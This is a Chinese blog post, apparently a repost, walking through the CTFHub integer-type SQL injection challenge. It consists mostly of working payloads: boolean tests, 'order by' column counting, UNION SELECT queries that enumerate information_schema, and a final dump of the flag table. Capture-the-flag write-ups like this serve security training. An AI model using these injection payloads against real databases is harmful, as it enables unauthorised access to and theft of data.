当前位置:首页 » 《休闲阅读》 » 正文

CTFHUB_web_sql整数型注入_JYSNkai的博客

27 人参与  2022年01月02日 16:15  分类 : 《休闲阅读》  评论

点击全文阅读


 

手动解题步骤

1. 检查是否存在注入

and 1=1 #返回正确  
and 1=2 #返回错误

 

 存在

2. 猜字段数 得出字段数

1 order by 1
1 order by 2
1 order by 3

 

可以看出存在俩个字段

3. 爆数据库名

-1 union select user(),database()

## -1是为了前面部分查询无结果,从而显示后面union的查询结果

 得到数据库名称sqli

4. 爆表名

-1 union select 999,group_concat(table_name)from information_schema.tables where table_schema='sqli'

 得到表名 news,flag

5. 爆列名

-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'

 得到字段名flag

6. 获得flag

-1 union select 1,group_concat(flag) from sqli.flag

 

 


点击全文阅读


本文链接:http://zhangshiyu.com/post/32552.html

字段  返回  数据库  
<< 上一篇 下一篇 >>

  • 评论(0)
  • 赞助本站

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

最新文章

  • 假千金空间通兽世乌行雪赫苍小说(乌行雪赫苍)前传+全书阅读新作预览
  • 重生后联姻丈夫爱上KTV小妹我死遁了(姜满裴聿琛温舒柠),重生后联姻丈夫爱上KTV小妹我死遁了
  • 睁眼大婚日,我踹了渣夫抱紧金大腿(云筝厉无恙)_睁眼大婚日,我踹了渣夫抱紧金大腿
  • 爱不复从前后续更新+番外_闻言温念初裴大校园甜文_小说后续在线阅读_无删减免费完结_
  • 海棠影下爱难寻(白若欢宋衍舟)_海棠影下爱难寻(白若欢宋衍舟)
  • 小说穿成烈士后代,下乡前搬空极品家小说已更新+番外篇章(于静静陆云霄)纯净阅读
  • 我抛弃赘婿去冲喜,黑道大佬却发疯了(许棠傅明礼)全书浏览_我抛弃赘婿去冲喜,黑道大佬却发疯了全书浏览
  • 鬓边不是牡丹红结局+后续(盛惟芳贺锦萧既明)_鬓边不是牡丹红结局+后续(盛惟芳贺锦萧既明)
  • 霍爷,夫人的离婚协议又寄来了热门榜首_南菫诺霍璟桉热门榜首_小说后续在线阅读_无删减免费完结_
  • 大婚日兄亡婚变(楚凌彻慕雪尘)全书免费_(楚凌彻慕雪尘)大婚日兄亡婚变后续(楚凌彻慕雪尘)
  • 独家江念柔裴景玹无删减(皇叔疯宠,娇娇美人逃不掉)(江念柔裴景玹)TXT免费版阅读
  • 等不到鬓雪相拥云朝朝(容临渊云朝朝沈清瑶)全书免费_(容临渊云朝朝沈清瑶)等不到鬓雪相拥云朝朝后续(容临渊云朝朝沈清瑶)

    关于我们 | 我要投稿 | 免责申明

    Copyright © 2020-2022 ZhangShiYu.com Rights Reserved.豫ICP备2022013469号-1